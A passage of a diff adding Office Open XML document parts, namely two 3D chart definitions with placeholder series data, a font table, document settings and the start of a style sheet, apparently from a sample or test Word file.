+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:axId val="50940928"/>
+<c:axId val="68729472"/>
+<c:axId val="78014208"/>
+</c:line3DChart>
+<c:catAx>
+<c:axId val="50940928"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68729472"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="68729472"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50940928"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="78014208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68729472"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,238 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:surface3DChart>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:bandFmts/>
+<c:axId val="59304576"/>
+<c:axId val="68746240"/>
+<c:axId val="59572224"/>
+</c:surface3DChart>
+<c:catAx>
+<c:axId val="59304576"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68746240"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="68746240"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="59304576"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="midCat"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="59572224"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68746240"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+<c:txPr>
+<a:bodyPr/>
+<a:lstStyle/>
+<a:p>
+<a:pPr rtl="0">
+<a:defRPr/>
+</a:pPr>
+<a:endParaRPr lang="en-US"/>
+</a:p>
+</c:txPr>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:font w:name="Calibri">
+<w:panose1 w:val="020F0502020204030204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="swiss"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Times New Roman">
+<w:panose1 w:val="02020603050405020304"/>
+<w:charset w:val="CC"/>
+<w:family w:val="roman"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Tahoma">
+<w:panose1 w:val="020B0604030504040204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="swiss"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Cambria">
+<w:panose1 w:val="02040503050406030204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="roman"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+</w:font>
+</w:fonts>
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
+<w:zoom w:percent="100"/>
+<w:proofState w:spelling="clean" w:grammar="clean"/>
+<w:defaultTabStop w:val="708"/>
+<w:characterSpacingControl w:val="doNotCompress"/>
+<w:compat/>
+<w:rsids>
+<w:rsidRoot w:val="00D15BD0"/>
+<w:rsid w:val="00D15BD0"/>
+<w:rsid w:val="00F8254F"/>
+</w:rsids>
+<m:mathPr>
+<m:mathFont m:val="Cambria Math"/>
+<m:brkBin m:val="before"/>
+<m:brkBinSub m:val="--"/>
+<m:smallFrac m:val="off"/>
+<m:dispDef/>
+<m:lMargin m:val="0"/>
+<m:rMargin m:val="0"/>
+<m:defJc m:val="centerGroup"/>
+<m:wrapIndent m:val="1440"/>
+<m:intLim m:val="subSup"/>
+<m:naryLim m:val="undOvr"/>
+</m:mathPr>
+<w:themeFontLang w:val="en-US"/>
+<w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
+<w:shapeDefaults>
+<o:shapedefaults v:ext="edit" spidmax="1026"/>
+<o:shapelayout v:ext="edit">
+<o:idmap v:ext="edit" data="1"/>
+</o:shapelayout>
+</w:shapeDefaults>
+<w:decimalSymbol w:val=","/>
+<w:listSeparator w:val=";"/>
+</w:settings>
@@ -0,0 +1,220 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:docDefaults>
+<w:rPrDefault>
+<w:rPr>
+<w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+<w:sz w:val="22"/>
+<w:szCs w:val="22"/>
+<w:lang w:val="en-US" w:bidi="ar-SA"/>
+</w:rPr>
+</w:rPrDefault>
+<w:pPrDefault>
+<w:pPr>
+<w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+</w:pPr>
+</w:pPrDefault>
+</w:docDefaults>
+<w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+<w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="toc 1" w:uiPriority="39"/>
+<w:lsdException w:name="toc 2" w:uiPriority="39"/>
+<w:lsdException w:name="toc 3" w:uiPriority="39"/>
+<w:lsdException w:name="toc 4" w:uiPriority="39"/>
+<w:lsdException w:name="toc 5" w:uiPriority="39"/>
+<w:lsdException w:name="toc 6" w:uiPriority="39"/>
+<w:lsdException w:name="toc 7" w:uiPriority="39"/>
+<w:lsdException w:name="toc 8" w:uiPriority="39"/>
+<w:lsdException w:name="toc 9" w:uiPriority="39"/>
+<w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+<w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+<w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
